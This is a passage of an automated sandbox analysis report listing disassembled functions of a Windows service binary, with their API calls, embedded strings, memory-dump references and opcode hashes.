                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$Info
                                      • String ID:
                                      • API String ID: 1775632426-0
                                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4572EB,?,?,?,00007FFE1A453EC0,?,?,?,?,00007FFE1A453CFD), ref: 00007FFE1A4571B1
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A4572EB,?,?,?,00007FFE1A453EC0,?,?,?,?,00007FFE1A453CFD), ref: 00007FFE1A4571BF
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4572EB,?,?,?,00007FFE1A453EC0,?,?,?,?,00007FFE1A453CFD), ref: 00007FFE1A4571E9
                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE1A4572EB,?,?,?,00007FFE1A453EC0,?,?,?,?,00007FFE1A453CFD), ref: 00007FFE1A457257
                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE1A4572EB,?,?,?,00007FFE1A453EC0,?,?,?,?,00007FFE1A453CFD), ref: 00007FFE1A457263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction ID: a85cb67550715257e8cd3163edd89df16ecd66e2c2b55689e0e36d7fba610864
                                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction Fuzzy Hash: 90319461B1AE4295EE15EB53A4105B963D4BF48FB0F5909B6ED2D0B760EF3CE4658300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction ID: e1fc4a4775dd09e9a6585fe7761cf388c398a0a3aef017cb254cf691d26db22f
                                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction Fuzzy Hash: 0221AFA4F0CE820AFA15B323565117921525F46FB0F1407F6E93E476F7EE6CA8618600
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                      • String ID: CONOUT$
                                      • API String ID: 3230265001-3130406586
                                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction ID: bdf7596337e1c2f4fa04988ad208b9ee57b177734239b1f00bd97ea272eee7fd
                                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction Fuzzy Hash: 39114C31B18E4186E7508B53B84437962B0BB88FF4F0442B6EA6D87BA4DF7CD9688744
                                      APIs
                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                      • String ID: vseamps
                                      • API String ID: 3197017603-3944098904
                                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Messagesprintf_s
                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                      • API String ID: 2642950106-3610746849
                                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 319667368-0
                                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 1390108997-0
                                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 3523768491-393685449
                                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction ID: 5576ece304f65b4074588e211f28955373e418b9eddf024e6578eb4d2d09740f
                                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction Fuzzy Hash: 8DE1C3B2F08B828AE750AF36D4402BD7BB0FB45B68F1401B6DA4D57666CF38E4A5C741
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A4595CB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A459601
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A45962E
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A45963F
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A459650
                                      • SetLastError.KERNEL32(?,?,?,00007FFE1A458BC9,?,?,?,?,00007FFE1A458C14), ref: 00007FFE1A45966B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction ID: b296e1e52c25e131c0b4fdadbb51ed88a8c68d7043da32c12ee79a606d022636
                                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction Fuzzy Hash: B8118BA8B0CE424AFA147323555117921529F45FB0F4403F7E83E4B6E6EEACA4668600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                      • String ID:
                                      • API String ID: 3326452711-0
                                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                      • API String ID: 2984211723-1229430080
                                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction ID: 7ec4b325063f9854cc2e5310a0e25620fc9075e8891c6507b2d3173ed639fb7b
                                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction Fuzzy Hash: A9F0AF61B18E0291EA108B22A4443396330AF84BB0F4406F7CA6D472F4DF3CE059C300
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressExitHandleModuleProcProcess
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 75539706-1276376045
                                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
